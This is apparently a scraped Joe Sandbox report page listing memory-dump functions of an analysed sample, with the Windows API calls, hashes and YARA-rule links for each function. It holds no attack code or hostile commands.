Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 3d2aca8ad3232ff8810368b870f956fa0574f1dbf84ae118e3339a7522c278e4
Instruction ID: 826ec43f70b67ea5a15b9fd0206578c334e70324040b8d068f6dd0a47120a5dc
Opcode Fuzzy Hash: 3d2aca8ad3232ff8810368b870f956fa0574f1dbf84ae118e3339a7522c278e4
Instruction Fuzzy Hash: 80E092315001689BCF50AB68CC05BD97798AB0D3E1F044261FE54F31D5D770EE84CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 000FDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 000FDEEC

Part of subcall function 000E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E40A5

SetDlgItemTextW.USER32(00000065,?), ref: 000FDF03

Part of subcall function 000FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000FB579
Part of subcall function 000FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000FB58A
Part of subcall function 000FB568: IsDialogMessageW.USER32(000204A2,?), ref: 000FB59E
Part of subcall function 000FB568: TranslateMessage.USER32(?), ref: 000FB5AC
Part of subcall function 000FB568: DispatchMessageW.USER32(?), ref: 000FB5B6

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 66970c662ec642b9557bb7e66c599a5d6928eea9f6f1c7b0435e9c6e4aca4db1
Instruction ID: d0fd285675318cce98ad1a9786c96f207c1c00c43a24bc5ffac457b40361105d
Opcode Fuzzy Hash: 66970c662ec642b9557bb7e66c599a5d6928eea9f6f1c7b0435e9c6e4aca4db1
Instruction Fuzzy Hash: 3EE092B64003CC3ADF12BB61DC06FEE3B6C5B15785F440861B304EA4B3DA78EA619A71

Uniqueness

Uniqueness Score: -1.00%

Function 000F081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000F0836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000EF2D8,Crypt32.dll,00000000,000EF35C,?,?,000EF33E,?,?,?), ref: 000F0858

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 155fad2be379f934ecdc91b368bb7e7de19000e27948c004c3a979195ec0feca
Instruction ID: e1aafc51b391995768e7339e83b426cf0c4be72123ec3bfdc09a12692ecfeb24
Opcode Fuzzy Hash: 155fad2be379f934ecdc91b368bb7e7de19000e27948c004c3a979195ec0feca
Instruction Fuzzy Hash: 15E092724001586ACB00A790DD04FEA7BACEF0C3D1F0400657645E2005DA74DA818AA0

Uniqueness

Uniqueness Score: -1.00%

Function 000FA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 000FA3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 000FA3E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 3f548082a509a23284247a2ce0b474e99e7d69e5a06032d790bb8811affe371e
Instruction ID: ed96d6b7cf9e204cad533e736ebec51b33887b44a175be5db1cd7c1246a2822f
Opcode Fuzzy Hash: 3f548082a509a23284247a2ce0b474e99e7d69e5a06032d790bb8811affe371e
Instruction Fuzzy Hash: A0E0EDB150021CEBCB50DF55C5416EEBBE8EF05760F10805AE94A93651E374AF44EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00102B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00102BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00102BB5

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 76d28c6624f1229f9d3ee1ac187175d3701d3af0dc2ea6ceebed8c438e1b0070
Instruction ID: 5ee2fffea2713a3fdc3f48ef318ee588101218d2613e5c3ac7e77ece70a29216
Opcode Fuzzy Hash: 76d28c6624f1229f9d3ee1ac187175d3701d3af0dc2ea6ceebed8c438e1b0070
Instruction Fuzzy Hash: F3D0A93525420018EC282AB42A0E5983389AE61BB2BE0428AF4B0868C1EFF18080A111

Uniqueness

Uniqueness Score: -1.00%

Function 000E12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 000E1306
ShowWindow.USER32(00000000), ref: 000E130D

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: e93752dcbdc51b710c71d187005894aa529a4f02cb1b7018210e8df5b03c2867
Instruction ID: d4ea7eb18e10375c5d23ebfeabd57c4a12ba48f7920299575fd63731c54b54da
Opcode Fuzzy Hash: e93752dcbdc51b710c71d187005894aa529a4f02cb1b7018210e8df5b03c2867
Instruction Fuzzy Hash: 5FC0123A05C240BFCB010BB4DC09C2BBBA8ABA6712F04C908B0B9C0070C238C150EB11

Uniqueness

Uniqueness Score: -1.00%

Function 000E1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000E1A09

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 8a6b9dee5e4a365a862d2135ef28d567971308a5315fa5c9ed9d6f4a58ce20df
Instruction ID: 7b14bdd7ae7ebc9fd56b50d3ff8b29d656432ac0da9fc31a7542e7ed183172bb
Opcode Fuzzy Hash: 8a6b9dee5e4a365a862d2135ef28d567971308a5315fa5c9ed9d6f4a58ce20df
Instruction Fuzzy Hash: EDC1D530A042949FEF59DF29C884BED7BE5AF15310F1801B9EC56EB396DB309984CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000E63E2 Relevance: 1.7, APIs: 1, Instructions: 187COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 000E6491

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: fb233ce7a5aff4237f521626d1ef48721b765c343b9cdda43a55cb90ced64ce7
Instruction ID: 296c70b6bf6735610b6cc7623028b6fc09e99916e90e5a138532aa7228e2de64
Opcode Fuzzy Hash: fb233ce7a5aff4237f521626d1ef48721b765c343b9cdda43a55cb90ced64ce7
Instruction Fuzzy Hash: 3451B6B7504345AFC761DA60DC45FDBB3EDEB89300F040939B999E7142EA72A548C762

Uniqueness

Uniqueness Score: -1.00%

Function 000E3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000E3BBF

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 99502df893077cae41a723ff69f9e29d0265495639be541afcf3fb18a8782d7d
Instruction ID: 150a89b76ad816c8f7b99446c84d1c620670f04ac0f03670b9220edbb0d17a3f
Opcode Fuzzy Hash: 99502df893077cae41a723ff69f9e29d0265495639be541afcf3fb18a8782d7d
Instruction Fuzzy Hash: 3571C471500BC49EDB35DB71C8559EBBBE9AF14300F44092EE2ABA7282DA326684DF11

Uniqueness

Uniqueness Score: -1.00%

Function 000E8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000E8289

Part of subcall function 000E13DC: __EH_prolog.LIBCMT ref: 000E13E1

Part of subcall function 000EA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 000EA598

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 6e89f2bba003b07d0ce0ebfdace52128e99e870f189da0e8cc1f65584794e01e
Instruction ID: 92bbb2627b5a93c7d387ccde608e35923f241ea8ae8923ee7cd3b48d52be2254
Opcode Fuzzy Hash: 6e89f2bba003b07d0ce0ebfdace52128e99e870f189da0e8cc1f65584794e01e
Instruction Fuzzy Hash: 4541A3719446989EDB24DBB2CC55AEAB7A8AF00304F4444EAE18EB7093EB715FC5CB50

Uniqueness

Uniqueness Score: -1.00%

Function 000E13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000E13E1

Part of subcall function 000E5E37: __EH_prolog.LIBCMT ref: 000E5E3C

Part of subcall function 000ECE40: __EH_prolog.LIBCMT ref: 000ECE45

Part of subcall function 000EB505: __EH_prolog.LIBCMT ref: 000EB50A

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 89fd160696c9c5c9ad42501f9fa30e717ab0349fad33341a8d47335f731ec1cb
Instruction ID: 415759ac29bd46258af2487d3792b70c190c4dd924725861b05ecfd9a323b1f7
Opcode Fuzzy Hash: 89fd160696c9c5c9ad42501f9fa30e717ab0349fad33341a8d47335f731ec1cb
Instruction Fuzzy Hash: C4413CB0905B819EE724DF7A8885AE7FBE5BF19300F50492EE5FE93282C7316654CB10

Uniqueness

Uniqueness Score: -1.00%

Function 000E13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000E13E1

Part of subcall function 000E5E37: __EH_prolog.LIBCMT ref: 000E5E3C

Part of subcall function 000ECE40: __EH_prolog.LIBCMT ref: 000ECE45

Part of subcall function 000EB505: __EH_prolog.LIBCMT ref: 000EB50A

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 51c7d3c334b7fc1f4451e53b0f6dd1e60aebb5c6fc2d1af7e16047fe6f626847
Instruction ID: 22d3dbcd131a6307c25a4af12fc3c92941e8d90505abb1ec06adf792dfdfba2c
Opcode Fuzzy Hash: 51c7d3c334b7fc1f4451e53b0f6dd1e60aebb5c6fc2d1af7e16047fe6f626847
Instruction Fuzzy Hash: 1B413BB0905B809EE724DF7A8885AE7FBE5BF19300F50492ED5FE93282CB316654CB11

Uniqueness

Uniqueness Score: -1.00%

Function 000F359E Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000F35A3

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2d0d490b55204585f4e6403fa3277af9cbbe252a2095cf7aabfdd2fa27e0fdfd
Instruction ID: 1872d160b955d0d8381d88d59816284797964bcfead3b79a7102e4ccfe69cd35
Opcode Fuzzy Hash: 2d0d490b55204585f4e6403fa3277af9cbbe252a2095cf7aabfdd2fa27e0fdfd
Instruction Fuzzy Hash: 8921E6B5E40219ABDB149F74DC416BB76A8FF14714F14423AA706EBA82D3709A00C6E8

Uniqueness

Uniqueness Score: -1.00%

Function 000FB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000FB098

Part of subcall function 000E13DC: __EH_prolog.LIBCMT ref: 000E13E1

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e8fdd5fdc6ea150beeafe5d2608ccd86c724c5079ecb232fb99591dba44f3434
Instruction ID: c4e71d2b834254c18a124947f7273146e4d033d5562b44a83ae12963f97eec01
Opcode Fuzzy Hash: e8fdd5fdc6ea150beeafe5d2608ccd86c724c5079ecb232fb99591dba44f3434
Instruction Fuzzy Hash: 0A319C75C00249DECF15DF65C851AFEBBB4AF09300F5044AEE409B7682DB35AE04DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0010AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 0010ACF8

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: e8b57439c9d0e9de48497f027504ffd74e901d90f6dec721b730ec0eee312815
Instruction ID: cd2924af3fcf0c1f4b2ad4860252c97963a270d53b5bc79e4c21b56af4cd5b36
Opcode Fuzzy Hash: e8b57439c9d0e9de48497f027504ffd74e901d90f6dec721b730ec0eee312815
Instruction Fuzzy Hash: 86110A33A003256FEB29DF98DD4099A7395AFC436075B8120FD95AB6D4D770EC4187D2

Uniqueness

Uniqueness Score: -1.00%

Function 000E9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000E921A

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: b3176fda82d70814cb5976e1b2195fecada8b94da29c8bb5b1461649693b04ee
Instruction ID: 967ae87d866f9c46c1e792b8db904a7605aeec9cbf031f18a02f4c062c08cf99
Opcode Fuzzy Hash: b3176fda82d70814cb5976e1b2195fecada8b94da29c8bb5b1461649693b04ee
Instruction Fuzzy Hash: E401A5339005A8AFCF11ABA9CC819DEB776FF88740F014129E916B7113DB348D01C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 0010C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 0010B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00109813,00000001,00000364,?,001040EF,?,?,00121098), ref: 0010B177

_free.LIBCMT ref: 0010C4E5

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction ID: 9790e20d356dda63e4b0d4dd4f68e0f48474c3df242f57f35a3fc4caf69da018
Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction Fuzzy Hash: 1F01D6722043056BE3318F69988596AFBE9FB95370F25061DE5D4832C1EB70A905CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0010B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00109813,00000001,00000364,?,001040EF,?,?,00121098), ref: 0010B177

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8eea78984848851f8e9500cacd0b5f4d7d85e0b000ada434343113a9f4dab18f
Instruction ID: ee6190bfcf7bb9d4ec4985376e04c5f5b29d0f3ea6fb49eee3b1c10b554d8c44
Opcode Fuzzy Hash: 8eea78984848851f8e9500cacd0b5f4d7d85e0b000ada434343113a9f4dab18f
Instruction Fuzzy Hash: 21F0E93260D124B7DB255A21BC65B9F3748AF51B70B198211FC98971D0CBF0DD0182E4

Uniqueness

Uniqueness Score: -1.00%

Function 00103C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00103C3F

Memory Dump Source

